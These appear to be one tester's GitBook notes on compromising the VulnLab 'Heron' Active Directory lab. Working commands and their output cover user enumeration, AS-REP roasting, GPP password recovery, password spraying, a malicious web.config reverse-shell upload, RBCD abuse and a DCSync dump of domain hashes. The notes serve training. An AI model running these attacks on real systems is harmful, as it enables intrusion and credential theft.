Intrusionz3r0
HacktheboxTwitter
  • Welcome
  • Windows Penetration Testing
    • Enumeration
    • Credentials Attacks On Windows
    • Kerberos
    • Abuse ACLS
    • Common Attacks
    • Abuse Tokens
    • Kerberos “Double Hop”
    • Privileged Groups
    • Defense Evasion
    • Active Directory Certificate Services
    • Windows Persistence
    • Privilege Escalation
    • Trust Enumeration and Attacks
    • Windows Lateral Movement
    • Powershell Cheetsheet
    • Microsoft Exchange and Office
  • Linux Penetration Testing
    • Linux Active directory
    • Tools
    • Privilege Groups
    • Post Exploitation
    • Privilege Escalation
      • Sudo Privilege escalation
      • Writable .service files
      • Wildcard on compression binaries
      • Path Abuse
      • Capabilities
      • Exploit Logrotate
      • Weak NFS Privileges
      • Hijacking Tmux Sessions
      • Shared Libraries
      • Shared Object Hijacking
      • Python Library Hijacking
      • Linux Enumeration
    • Stealing Linux Credentials
    • Critical Vulnerabilities
    • Upgrading TTY
    • Process monitoring
    • Miscellaneous
    • Escape Restricted Shell
  • Malware Development
    • Malware Development Essentials
    • Code Snippets
    • Malware Development Intermediate
  • Social Engineering
  • Portforwarding and tunneling
  • File Transfer Techniques
  • Password Attacks
  • Enumeration
    • Network Enumeration
    • (OSINT) Active Enumeration
    • (OSINT) Passive Enumeration
    • [22] SSH
    • [21] FTP
    • [25,465,587] SMTP
    • [53] DNS Enumeration
    • [80 443] HTTP HTTPS
    • [110,143,993,995] IMAP/POP3 Enumeration
    • [111,2049] Network File System
    • [139,445] SMB Enumeration
    • [161] SNMP
    • [512,513,514] R-Services
    • [623] IPMI
    • [873] Rsync
    • [1433] MSSQL
    • [1521] Oracle TNS
    • [3389] Remote Desktop Protocol (RDP)
    • [5985/5986] WinRM
    • [3306] Mysql
    • [513] Rlogin
  • Hacking Web
    • Methodology
    • Vulnerabilities
      • SQL Injection
      • Cross Site Scripting (XSS)
      • File path traversal/Local File Inclusion
      • File Upload Attacks
      • Denial of Service
      • Command Injection
      • Insecure Direct Object Reference (IDOR)
      • XML External Entity (XXE) Injection
      • Web Mass Assignment Vulnerabilities
      • Log4Shell Exploitation Guide
      • Authentication
      • Business Vulnerabilities
      • Access control vulnerabilities
      • Server-Side Request Forgery (SSRF)
      • Cross-site request forgery (CSRF)
      • Cross-origin resource sharing (CORS)
      • Clickjacking
      • DOM-based vulnerabilities
      • JWT vulnerabilities
      • Password reset poisoning
    • Web Tech Detection viaa Tokens, Headers & Cookies
    • Burpsuite through SOCKS5
    • Bypass 403 - Forbidden
  • OSINT
  • Common Applications
    • Gitlab
    • Splunk
    • Tomcat
    • Joomla
    • Microsoft Internet Information Services (IIS)
    • Nagios XI
    • Wordpress
    • Drupal
    • Tomcat CGI
    • osTicket
    • Attacking Thick Client Applications
    • PRTG Network Monitor
    • Jenkins
    • ColdFusion
    • WebLogic
    • Grafana
    • Umbraco
  • Containers Pentesting
  • C2 Command and Control
    • Sliver
    • Cobalt Strike
    • Mythic
    • Havoc
  • Report Templates
  • Anonymity Guide
  • Labs
    • Vulnlabs
      • Baby
      • Trusted (Chain)
      • Retro
      • Retro2
      • Hybrid (Chain)
      • Baby2
      • Breach
      • Sendai
      • Sweep
      • Delegate
      • Redelegate
      • Media
      • Bruno
      • Cicada
      • Lustrous2
      • Tengu (Chain)
      • Reflection (Chain)
      • Tea (Chain)
      • Heron (Chain)
      • Lustrous (Chain)
      • Kaiju (Chain)
      • Intercept (Chain)
      • Sidecar (Chain)
      • Vigilant (Chain)
      • Job
      • Job2
      • Puppet (Chain)
      • Mythical (Chain)
      • Push (Chain)
Powered by GitBook
On this page
  • Machine information
  • Credentials
  • Information Gathering
  • Service Enumeration
  • 10.10.231.37
  • Initial foothold on Heron
  • Compromising FRAJMP Host
  • Compromising Domain Controller (Heron.vl)
  1. Labs
  2. Vulnlabs

Heron (Chain)

This is not a writeup, just my notes about VulnLabs machines.

PreviousTea (Chain)NextLustrous (Chain)

Last updated 1 month ago

Machine information

Operating System:

Chain: False (standalone compromise)pent

Credentials

Username
Password
Method
Scope

pentest

Heron123!

Provided by customer

Initial tester user

samuel.davies

l6fkiy9oN

Asreproast

Domain User

svc-web-accounting-d

H3r0n2024#!

Groups XML + Password Spraying

Domain User

_local

Deplete5DenialDealt

Password Spraying Attack

Domain User

Julian.Pratt

Deplete5DenialDealt

Re use Credentials

Domain User

adm_prju

ayDMWV929N9wAiB4

Retrieved in .ink files

Domain User

✅ Valid Usernames

amanda.williams
steven.thomas
vanessa.anderson
danielle.harrison
adam.harper
adam.matthews
wayne.wood
alice.hill
jane.richards
anthony.goodwin
jayne.johnson
katherine.howard
samuel.davies
Guest
krbtgt
Katherine.Howard
Rachael.Boyle
Anthony.Goodwin
Carol.John
Rosie.Evans
Adam.Harper
Adam.Matthews
Steven.Thomas
Amanda.Williams
Vanessa.Anderson
Jane.Richards
Rhys.George
Mohammed.Parry
Julian.Pratt
Wayne.Wood
Danielle.Harrison
Samuel.Davies
Alice.Hill
Jayne.Johnson
Geraldine.Powell
adm_hoka
adm_prju
svc-web-accounting
svc-web-accounting-d

🔑 Passwords list

l6fkiy9oN

Information Gathering

Nmap

Nmap scan report for 10.10.231.37
PORT      STATE SERVICE       REASON
53/tcp    open  domain        syn-ack
80/tcp    open  http          syn-ack
88/tcp    open  kerberos      syn-ack
135/tcp   open  epmap         syn-ack
139/tcp   open  netbios-ssn   syn-ack
389/tcp   open  ldap          syn-ack
445/tcp   open  microsoft-ds  syn-ack
464/tcp   open  kpasswd       syn-ack
593/tcp   open  unknown       syn-ack
636/tcp   open  ldaps         syn-ack
3268/tcp  open  unknown       syn-ack
3269/tcp  open  unknown       syn-ack
3389/tcp  open  ms-wbt-server syn-ack
9389/tcp  open  unknown       syn-ack
49664/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack
58818/tcp open  unknown       syn-ack
58838/tcp open  unknown       syn-ack
62422/tcp open  unknown       syn-ack
62440/tcp open  unknown       syn-ack
62483/tcp open  unknown       syn-ack

Service Enumeration

10.10.231.37

SMB (enum4linux-ng)

  • Root/parent Domain

  • Domain SID: S-1-5-21-1568358163-2901064146-3316491674

  • Domain: heron.vl

  • FQDN: mucdc.heron.vl

  • NetBIOS: HERON

  • SMB Signing: True

  • Server Allows Null session authentication

HTTP:80

Initial foothold on Heron

Setting up a tunnel to reach the internal network

❯ sudo sshuttle -r pentest@10.10.231.38 10.10.231.37 -v

Discovering Valid users via Kerbrute user enumeration

❯ /opt/kerbrute/kerbrute userenum -d heron.vl --dc 10.10.231.37 /opt/statistically-likely-usernames/john.smith.txt  -t 65

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 04/24/25 - Ronnie Flathers @ropnop

2025/04/24 14:43:50 >  Using KDC(s):
2025/04/24 14:43:50 >  	10.10.231.37:88

2025/04/24 14:43:52 >  [+] VALID USERNAME:	amanda.williams@heron.vl
2025/04/24 14:44:00 >  [+] VALID USERNAME:	steven.thomas@heron.vl
2025/04/24 14:45:03 >  [+] VALID USERNAME:	vanessa.anderson@heron.vl
2025/04/24 14:45:53 >  [+] VALID USERNAME:	danielle.harrison@heron.vl
2025/04/24 14:46:26 >  [+] VALID USERNAME:	adam.harper@heron.vl
2025/04/24 14:46:28 >  [+] VALID USERNAME:	adam.matthews@heron.vl
2025/04/24 14:47:08 >  [+] VALID USERNAME:	wayne.wood@heron.vl
2025/04/24 14:48:50 >  [+] VALID USERNAME:	alice.hill@heron.vl
2025/04/24 14:49:25 >  [+] VALID USERNAME:	jane.richards@heron.vl
2025/04/24 14:50:46 >  [+] VALID USERNAME:	anthony.goodwin@heron.vl
2025/04/24 14:50:51 >  [+] VALID USERNAME:	jayne.johnson@heron.vl
2025/04/24 14:51:05 >  [+] VALID USERNAME:	katherine.howard@heron.vl
2025/04/24 14:55:31 >  Done! Tested 248231 usernames (12 valid) in 700.655 seconds

Discoverign Asreproastable user

❯ impacket-GetNPUsers heron.vl/ -no-pass -usersfile users.txt -dc-ip 10.10.231.37 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] User amanda.williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User steven.thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User vanessa.anderson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User danielle.harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User adam.harper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User adam.matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User alice.hill doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jane.richards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User anthony.goodwin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jayne.johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User katherine.howard doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$samuel.davies@HERON.VL:94d6c72b09d88f048c03de3309854f35$2d81f9c444f4761938f0cfa79d919dc974e2207eef980b0c2f39d073f16d0661a44f42bf85341630d959c8812ca7ee78de70bfc65d936591eefb22e28775cc4f73e4bd44197c511057954ad104cda16b92a30ea0d21a8ddaf381a6ae40f10237c1143b3c653587a3a9113f28b892d4451be2ba419c337d02e7d466b02ba150f72a5bda435424e3fe43341e035b7c6ac84da7d830dec39a44346bf9c5be905760a33bc6459cedd65e58e9ab4c0ebc230d5b4ecb530870b2033c04645a3ea1b034368a9e21f6bb78965699db9e61c9a0ba6a057191b5bc69d04014f4700ed6c4a77729868e

Cracking samuel.davies' hash

❯ hashcat -a 0 -m 18200 samuel.davies.asreproast /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5asrep$23$samuel.davies@HERON.VL:94d6c72b09d88f048c03de3309854f35$2d81f9c444f4761938f0cfa79d919dc974e2207eef980b0c2f39d073f16d0661a44f42bf85341630d959c8812ca7ee78de70bfc65d936591eefb22e28775cc4f73e4bd44197c511057954ad104cda16b92a30ea0d21a8ddaf381a6ae40f10237c1143b3c653587a3a9113f28b892d4451be2ba419c337d02e7d466b02ba150f72a5bda435424e3fe43341e035b7c6ac84da7d830dec39a44346bf9c5be905760a33bc6459cedd65e58e9ab4c0ebc230d5b4ecb530870b2033c04645a3ea1b034368a9e21f6bb78965699db9e61c9a0ba6a057191b5bc69d04014f4700ed6c4a77729868e:l6fkiy9oN

Discovering groups.xml within the sysvol share

❯ nxc smb 10.10.231.37  -u samuel.davies -p 'l6fkiy9oN' --shares -M spider_plus

File: 10.10.231.37.json
----------------------------------
       "heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml": {
            "atime_epoch": "2024-06-04 12:01:07",
            "ctime_epoch": "2024-06-04 11:59:44",
            "mtime_epoch": "2024-06-04 12:01:07",
            "size": "1.11 KB"
        },

Extracting the GPP Password using NetExec

❯ nxc smb 10.10.231.37  -u samuel.davies -p 'l6fkiy9oN' -M gpp_password
<SNIF>
GPP_PASS... 10.10.231.37    445    MUCDC            [*] Found heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.231.37    445    MUCDC            [+] Found credentials in heron.vl/Policies/{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}/Machine/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.231.37    445    MUCDC            Password: H3r0n2024#!
GPP_PASS... 10.10.231.37    445    MUCDC            action: U
GPP_PASS... 10.10.231.37    445    MUCDC            newName: _local
GPP_PASS... 10.10.231.37    445    MUCDC            fullName: 
GPP_PASS... 10.10.231.37    445    MUCDC            description: local administrator
GPP_PASS... 10.10.231.37    445    MUCDC            changeLogon: 0
GPP_PASS... 10.10.231.37    445    MUCDC            noChange: 0
GPP_PASS... 10.10.231.37    445    MUCDC            neverExpires: 1
GPP_PASS... 10.10.231.37    445    MUCDC            acctDisabled: 0
GPP_PASS... 10.10.231.37    445    MUCDC            subAuthority: RID_ADMIN
GPP_PASS... 10.10.231.37    445    MUCDC            userName: Administrator (built-in)

Password Spraying attack

❯ nxc smb 10.10.231.37 -u users.txt -p 'H3r0n2024#!'
SMB         10.10.231.37    445    MUCDC            [+] heron.vl\svc-web-accounting-d:H3r0n2024#!

Remote command Execution via web.config

The tester discovered the user svc-web-accounting-d possesses Read and Write permission over Accounting$ share that is hosting the web configuration including web.config and revealed the presence of a new subdomain named accounting.

❯ smbclient '\\10.10.231.37\accounting$' -U 'svc-web-accounting-d%H3r0n2024#!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 24 15:40:06 2025
  ..                                DHS        0  Sun Jun  2 11:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 15:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 15:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 15:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 15:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sat Jun  1 18:22:20 2024
  appsettings.Development.json        A      127  Sat Jun  1 18:00:54 2024
  appsettings.json                    A      237  Sat Jun  1 18:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 10:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 05:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 08:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 08:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 08:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 03:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 03:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 03:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 03:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 03:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 18:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 08:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 08:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 06:05:26 2024
  runtimes                            D        0  Sat Jun  1 10:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Wed Aug 23 22:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Wed Aug 23 22:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Wed Aug 23 22:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Tue Oct 31 19:00:24 2023
  web.config                          A      554  Thu Jun  6 10:41:39 2024
  wwwroot                             D        0  Sat Jun  1 10:51:32 2024

		6261499 blocks of size 4096. 1961394 blocks available
smb: \> 

The tester proceeded to upload a web.config as follows:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="powershell" arguments="-e HOAXSHELL/REVSHELL" hostingModel="OutOfProcess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

And finally, trigger the execution of the reverse shell.

❯ curl http://accounting.heron.vl/execute.now

Discovering _local user credentials

Performing Password Spraying attack

The tester proceeded to perform a password spraying attack using the previously found password, as the account appeared to be a service account, suggesting that some users may have the bad practice of reusing credentials.

 nxc smb 10.10.231.37 -u users.txt -p 'Deplete5DenialDealt' 
SMB         10.10.231.37    445    MUCDC            [+] heron.vl\Julian.Pratt:Deplete5DenialDealt 

Discovering adm_prju user credentials

During the home directory enumeration the tester discovered that the user Julian.Pratt had a shortcuts files.

❯ smbclient '\\10.10.231.37\home$' -U 'Julian.Pratt%Deplete5DenialDealt'
Try "help" to get a list of possible commands.
smb: \> cd Julian.Pratt
smb: \Julian.Pratt\> dir
  .                                   D        0  Sun Jun  2 06:47:14 2024
  ..                                  D        0  Sat Jun  1 11:10:46 2024
  frajmp.lnk                          A     1443  Sun Jun  2 06:47:47 2024
  Is there a way to -auto login- in PuTTY with a password- - Super User.url      A      117  Sat Jun  1 11:44:44 2024
  Microsoft Edge.lnk                  A     2312  Sat Jun  1 11:44:38 2024
  mucjmp.lnk                          A     1441  Sun Jun  2 06:47:33 2024

		6261499 blocks of size 4096. 1959823 blocks available
smb: \Julian.Pratt\> get frajmp.lnk
getting file \Julian.Pratt\frajmp.lnk of size 1443 as frajmp.lnk (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \Julian.Pratt\> get mucjmp.lnk
getting file \Julian.Pratt\mucjmp.lnk of size 1441 as mucjmp.lnk (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec)
smb: \Julian.Pratt\>

The files was analyzed revealing the adm_prju's password.

❯ cat mucjmp.lnk
C:\Program Files\PuTTY\putty.exe..\..\Program Files\PuTTY\putty.exeC:\Program Files\PuTTY$adm_prju@mucjmp -pw ayDMWV929N9wAiB4

Compromising FRAJMP Host

Privilege escalation to root

pentest@frajmp:~$ su _local
Password: 
_local@frajmp:/home/pentest$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/home/pentest$ sudo su
root@frajmp:/home/pentest# 

Obtaining the NT Hash FRAJMP computer account

oot@frajmp:/home/pentest# python3 keytabextract.py  /etc/krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
	REALM : HERON.VL
	SERVICE PRINCIPAL : FRAJMP$/
	NTLM HASH : 6f55b3b443ef192c804b2ae98e8254f7
	AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
	AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
root@frajmp:/home/pentest# 

Compromising Domain Controller (Heron.vl)

During enumeration, the tester identified that the user ADM_PRJU@HERON.VL is a member of the group ADMINS_T1@HERON.VL, which has WriteAccountRestrictions privileges over the machine account MUCDC.HERON.VL.

This privilege enables the abuse of Resource-Based Constrained Delegation (RBCD) by modifying the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. As a result, the tester successfully granted delegation rights to the computer account FRAJMP$, impersonated the MUCDC$ computer account, and compromised the domain controller via a DCSync attack.

Abusing RBCD to compromise domain controller

❯ impacket-rbcd -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' 'HERON.vl/adm_prju:ayDMWV929N9wAiB4'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FRAJMP$ can now impersonate users on MUCDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FRAJMP$      (S-1-5-21-1568358163-2901064146-3316491674-27101)

Requesting TGT using S4U for MUCDC$

 impacket-getST -spn 'cifs/mucdc.heron.vl' -impersonate 'MUCDC$' 'heron.vl/FRAJMP$' -hashes :6f55b3b443ef192c804b2ae98e8254f7 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating MUCDC$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in MUCDC$@cifs_mucdc.heron.vl@HERON.VL.ccache

Performing DCSync Attack

❯ KRB5CCNAME='MUCDC$@cifs_mucdc.heron.vl@HERON.VL.ccache' impacket-secretsdump -k -no-pass mucdc.heron.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
_admin:500:aad3b435b51404eeaad3b435b51404ee:3998cdd28f164fa95983caf1ec603938:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9c586ab9529b5a6445e501b2208403f2:::
heron.vl\Katherine.Howard:24575:aad3b435b51404eeaad3b435b51404ee:6548c4cf2aac7a7d1b02d62b2e1a03d2:::
heron.vl\Rachael.Boyle:24576:aad3b435b51404eeaad3b435b51404ee:9dbe3e4834072d582e8d93c892348e6a:::
heron.vl\Anthony.Goodwin:24577:aad3b435b51404eeaad3b435b51404ee:b87a22f9ae78745edaf7070389e10bac:::
heron.vl\Carol.John:24578:aad3b435b51404eeaad3b435b51404ee:46b1a4375e32c380a6dcf38a8bb7fb74:::
heron.vl\Rosie.Evans:24579:aad3b435b51404eeaad3b435b51404ee:6e59150f19d36b11c49d060249e908ad:::
heron.vl\Adam.Harper:24580:aad3b435b51404eeaad3b435b51404ee:a5468ccbf390bba74aaf5554f3d3555e:::
heron.vl\Adam.Matthews:24581:aad3b435b51404eeaad3b435b51404ee:fa460c769bf2327c61e535787476e6a3:::
heron.vl\Steven.Thomas:24582:aad3b435b51404eeaad3b435b51404ee:dd635bb1378d97b947b84f40886e9e64:::
heron.vl\Amanda.Williams:24583:aad3b435b51404eeaad3b435b51404ee:6d33e1c539d3abe7fbfc15b09f1e94a5:::
heron.vl\Vanessa.Anderson:24584:aad3b435b51404eeaad3b435b51404ee:d8b0393689f523f02daa715a9f49083e:::
heron.vl\Jane.Richards:24585:aad3b435b51404eeaad3b435b51404ee:550f678b1a5b5bbe263860e4e6136910:::
heron.vl\Rhys.George:24586:aad3b435b51404eeaad3b435b51404ee:2718fc2f944887ed9511d934e0249234:::
heron.vl\Mohammed.Parry:24587:aad3b435b51404eeaad3b435b51404ee:01e7bba60d0469ea860ee8dfc83f5d80:::
heron.vl\Julian.Pratt:24588:aad3b435b51404eeaad3b435b51404ee:5bb0b312fa6a1bd0b89b179e3e6f1288:::
heron.vl\Wayne.Wood:24589:aad3b435b51404eeaad3b435b51404ee:7a2320fceec0c816bb48190ec143a2bb:::
heron.vl\Danielle.Harrison:24590:aad3b435b51404eeaad3b435b51404ee:558ca476742a54e6f2d469ac4d1abadf:::
heron.vl\Samuel.Davies:24591:aad3b435b51404eeaad3b435b51404ee:4a976cc04f49221cf1d950132f84ed2c:::
heron.vl\Alice.Hill:24592:aad3b435b51404eeaad3b435b51404ee:c62c0e85ad1e975b14181f65bfff7257:::
heron.vl\Jayne.Johnson:24593:aad3b435b51404eeaad3b435b51404ee:273b684425d847c07b05391a9f35f2ef:::
heron.vl\Geraldine.Powell:24594:aad3b435b51404eeaad3b435b51404ee:5003da60cacbbc1ba80df96d7af1e7e8:::
heron.vl\adm_hoka:24595:aad3b435b51404eeaad3b435b51404ee:4bb9e0417af7f8adedd01382f1453b38:::
heron.vl\adm_prju:24596:aad3b435b51404eeaad3b435b51404ee:80ae9e479b40971bc9cac183651dad05:::
heron.vl\svc-web-accounting:24602:aad3b435b51404eeaad3b435b51404ee:f9113ad2e51cee72034043daa948d5de:::
heron.vl\svc-web-accounting-d:26101:aad3b435b51404eeaad3b435b51404ee:bf95ac22b6d87880f9eb3dfdf3d416f9:::
MUCDC$:1000:aad3b435b51404eeaad3b435b51404ee:c866bc764b6b7e70dd02f0f513d1aae3:::
MUCJMP$:24598:aad3b435b51404eeaad3b435b51404ee:ed656b46276f52cb5dae4ecdf0acd26c:::
ACCOUNTING-STAG$:26601:aad3b435b51404eeaad3b435b51404ee:7342a72fc3c418edeb9f98497c3857d4:::
ACCOUNTING-PREP$:26602:aad3b435b51404eeaad3b435b51404ee:7d9fb2f2bbf68b7d8dd52414bca20540:::
FRAJMP$:27101:aad3b435b51404eeaad3b435b51404ee:6f55b3b443ef192c804b2ae98e8254f7:::